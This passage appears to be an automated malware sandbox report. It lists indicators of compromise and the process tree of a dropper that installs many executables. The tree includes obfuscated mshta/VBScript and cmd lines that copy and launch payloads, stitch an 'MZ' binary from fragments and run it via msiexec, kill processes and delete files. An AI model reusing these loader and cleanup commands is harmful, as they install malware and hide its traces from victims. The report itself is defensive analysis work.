WinHttp.WinHttpRequest.5) HTTP User-Agent header 1257 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2082 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2308 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 606 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2346 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1559 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2092 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 540 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 630 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1816 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2007 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2110 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2243 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2326 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4304 Fri051e1e7444.exe 4304 Fri051e1e7444.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2672 Process not Found 3932 foldershare.exe 4456 ShellExperienceHost.exe -
Suspicious behavior: MapViewOfSection 29 IoCs
pid Process 2768 OcB4jBzI70tFnRtK1WZB1Ocm.exe 344 EF78.exe 3512 MicrosoftEdgeCP.exe 5804 3E6B.exe 5412 regsvr32.exe 5228 regsvr32.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 224 ghdhvts 904 rvdhvts 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 6868 regsvr32.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 4244 ghdhvts 7608 rvdhvts 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4984 UJrypcnxqC2LaOpY9q8RWOKu.exe Token: SeDebugPrivilege 4236 fgEDF5i3cgIOuMMvQaNZ1NCZ.exe Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeDebugPrivilege 1900 DownFlSetup999.exe Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeCreateTokenPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeAssignPrimaryTokenPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeLockMemoryPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeIncreaseQuotaPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeMachineAccountPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeTcbPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSecurityPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeTakeOwnershipPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeLoadDriverPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSystemProfilePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSystemtimePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeProfSingleProcessPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeIncBasePriorityPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeCreatePagefilePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeCreatePermanentPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeBackupPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeRestorePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeShutdownPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeDebugPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeAuditPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSystemEnvironmentPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeChangeNotifyPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeRemoteShutdownPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeUndockPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeSyncAgentPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeEnableDelegationPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeManageVolumePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeImpersonatePrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeCreateGlobalPrivilege 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 31 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 32 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 33 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 34 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: 35 3276 n6LyyW6Y130rISPizyLnNBN_.exe Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeDebugPrivilege 4500 DYbALA.exe Token: SeDebugPrivilege 4832 taskkill.exe Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeShutdownPrivilege 2672 Process not Found Token: SeCreatePagefilePrivilege 2672 Process not Found Token: SeShutdownPrivilege 2672 Process not Found -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 2672 Process not Found 2672 Process not Found 5276 setup.tmp 6552 Calculator.exe 2672 Process not Found 2672 Process not Found 2672 Process not Found 2672 Process not Found -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2672 Process not Found 968 MicrosoftEdge.exe 3512 MicrosoftEdgeCP.exe 3512 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4304 wrote to memory of 1180 4304 Fri051e1e7444.exe 71 PID 4304 wrote to memory of 1180 4304 Fri051e1e7444.exe 71 PID 4304 wrote to memory of 3876 4304 Fri051e1e7444.exe 72 PID 4304 wrote to memory of 3876 4304 Fri051e1e7444.exe 72 PID 4304 wrote to memory of 3876 4304 Fri051e1e7444.exe 72 PID 4304 wrote to memory of 4368 4304 Fri051e1e7444.exe 73 PID 4304 wrote to memory of 4368 4304 Fri051e1e7444.exe 73 PID 4304 wrote to memory of 4368 4304 Fri051e1e7444.exe 73 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4368 wrote to memory of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 4304 wrote to memory of 4984 4304 Fri051e1e7444.exe 75 PID 4304 wrote to memory of 4984 4304 Fri051e1e7444.exe 75 PID 4304 wrote to memory of 4236 4304 Fri051e1e7444.exe 76 PID 4304 wrote to memory of 4236 4304 Fri051e1e7444.exe 76 PID 4304 wrote to memory of 4236 4304 Fri051e1e7444.exe 76 PID 4304 wrote to memory of 4668 4304 Fri051e1e7444.exe 77 PID 4304 wrote to memory of 4668 4304 Fri051e1e7444.exe 77 PID 4304 wrote to memory of 4668 4304 Fri051e1e7444.exe 77 PID 4304 wrote to memory of 3680 4304 Fri051e1e7444.exe 78 PID 4304 wrote to memory of 3680 4304 Fri051e1e7444.exe 78 PID 4304 wrote to memory of 3680 4304 Fri051e1e7444.exe 78 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 4304 wrote to memory of 772 4304 Fri051e1e7444.exe 81 PID 4304 wrote to memory of 772 4304 Fri051e1e7444.exe 81 PID 4304 wrote to memory of 772 4304 Fri051e1e7444.exe 81 PID 772 wrote to memory of 740 772 aoWnOtt3BnvpIQ5LuYSMKmgs.exe 82 PID 772 wrote to memory of 740 772 aoWnOtt3BnvpIQ5LuYSMKmgs.exe 82 PID 772 wrote to memory of 740 772 aoWnOtt3BnvpIQ5LuYSMKmgs.exe 82 PID 4304 wrote to memory of 708 4304 Fri051e1e7444.exe 83 PID 4304 wrote to memory of 708 4304 Fri051e1e7444.exe 83 PID 4304 wrote to memory of 708 4304 Fri051e1e7444.exe 83 PID 4304 wrote to memory of 996 4304 Fri051e1e7444.exe 84 PID 4304 wrote to memory of 996 4304 Fri051e1e7444.exe 84 PID 4304 wrote to memory of 996 4304 Fri051e1e7444.exe 84 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3680 wrote to memory of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 4304 wrote to memory of 1308 4304 Fri051e1e7444.exe 86 PID 4304 wrote to memory of 1308 4304 Fri051e1e7444.exe 86 PID 708 wrote to memory of 1740 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 87 PID 708 wrote to memory of 1740 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 87 PID 708 wrote to memory of 1900 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 90 PID 708 wrote to memory of 1900 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 90 PID 708 wrote to memory of 1576 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 89 PID 708 wrote to memory of 1576 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 89 PID 708 wrote to memory of 1576 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 89 PID 1308 wrote to memory of 1276 1308 cwvHAknFTAWGE2B0rxX1TkrF.exe 91 PID 1308 wrote to memory of 1276 1308 cwvHAknFTAWGE2B0rxX1TkrF.exe 91 PID 1308 wrote to memory of 1276 1308 cwvHAknFTAWGE2B0rxX1TkrF.exe 91 PID 4304 wrote to memory of 3824 4304 Fri051e1e7444.exe 92 PID 4304 wrote to memory of 3824 4304 Fri051e1e7444.exe 92 PID 4304 wrote to memory of 3824 4304 Fri051e1e7444.exe 92 PID 4304 wrote to memory of 3276 4304 Fri051e1e7444.exe 93 PID 4304 wrote to memory of 3276 4304 Fri051e1e7444.exe 93 PID 4304 wrote to memory of 3276 4304 Fri051e1e7444.exe 93 PID 4304 wrote to memory of 3196 4304 Fri051e1e7444.exe 94 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 727C.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 727C.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\Pictures\Adobe Films\RqcBdtquQCGLaKIMXJSNd_ZL.exe"C:\Users\Admin\Pictures\Adobe Films\RqcBdtquQCGLaKIMXJSNd_ZL.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1180
-
-
C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe"C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RYVmga2gCYCILuVDQzIlK5af.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe" & del C:\ProgramData\*.dll & exit3⤵PID:648
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RYVmga2gCYCILuVDQzIlK5af.exe /f4⤵
- Kills process with taskkill
PID:2012
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:2832
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2768
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UJrypcnxqC2LaOpY9q8RWOKu.exe"C:\Users\Admin\Pictures\Adobe Films\UJrypcnxqC2LaOpY9q8RWOKu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Users\Admin\Pictures\Adobe Films\fgEDF5i3cgIOuMMvQaNZ1NCZ.exe"C:\Users\Admin\Pictures\Adobe Films\fgEDF5i3cgIOuMMvQaNZ1NCZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4236 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"3⤵
- Executes dropped EXE
PID:3580 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"4⤵
- Executes dropped EXE
PID:4624
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit5⤵PID:2496
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Soft1WW02.exe /f6⤵
- Kills process with taskkill
PID:4336
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
PID:500
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"4⤵
- Executes dropped EXE
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\is-NV6NO.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-NV6NO.tmp\setup.tmp" /SL5="$F01CC,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:200 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT6⤵
- Executes dropped EXE
PID:5160 -
C:\Users\Admin\AppData\Local\Temp\is-CE7T0.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-CE7T0.tmp\setup.tmp" /SL5="$502EE,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5276 -
C:\Users\Admin\AppData\Local\Temp\is-01D20.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-01D20.tmp\postback.exe" ss18⤵
- Executes dropped EXE
PID:2524
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart8⤵
- Executes dropped EXE
PID:2876 -
C:\436dd42121a8482a2d6b8730\Setup.exeC:\436dd42121a8482a2d6b8730\\Setup.exe /q /norestart /x86 /x64 /web9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5232
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss18⤵
- Executes dropped EXE
- Checks computer location settings
PID:2568
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst2.exe"C:\Users\Admin\AppData\Local\Temp\inst2.exe"4⤵
- Executes dropped EXE
PID:1068
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"4⤵
- Executes dropped EXE
PID:2072 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5244
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:3696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Executes dropped EXE
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
PID:1752 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:5372
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30007⤵
- Runs ping.exe
PID:4888
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"4⤵
- Executes dropped EXE
PID:2976
-
-
C:\Users\Admin\AppData\Local\Temp\customer7.exe"C:\Users\Admin\AppData\Local\Temp\customer7.exe"4⤵
- Executes dropped EXE
PID:4940
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵
- Executes dropped EXE
PID:5168 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 6645⤵
- Program crash
PID:5404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 7085⤵
- Program crash
PID:5592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 6925⤵
- Program crash
PID:5656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 8565⤵
- Program crash
PID:5700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 9525⤵
- Program crash
PID:5760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 11885⤵
- Program crash
PID:5900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 11605⤵
- Program crash
PID:5936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 12045⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5960
-
-
-
C:\Users\Admin\AppData\Local\Temp\sfx.exe"C:\Users\Admin\AppData\Local\Temp\sfx.exe"4⤵
- Executes dropped EXE
PID:5228 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
PID:5932 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )6⤵PID:4688
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ) do taskkill -f -iM "%~NxM"7⤵PID:3816
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi8⤵
- Executes dropped EXE
PID:4004 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:3680
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:5756
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )9⤵PID:4568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC10⤵PID:5728
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"11⤵PID:5464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "11⤵PID:5604
-
-
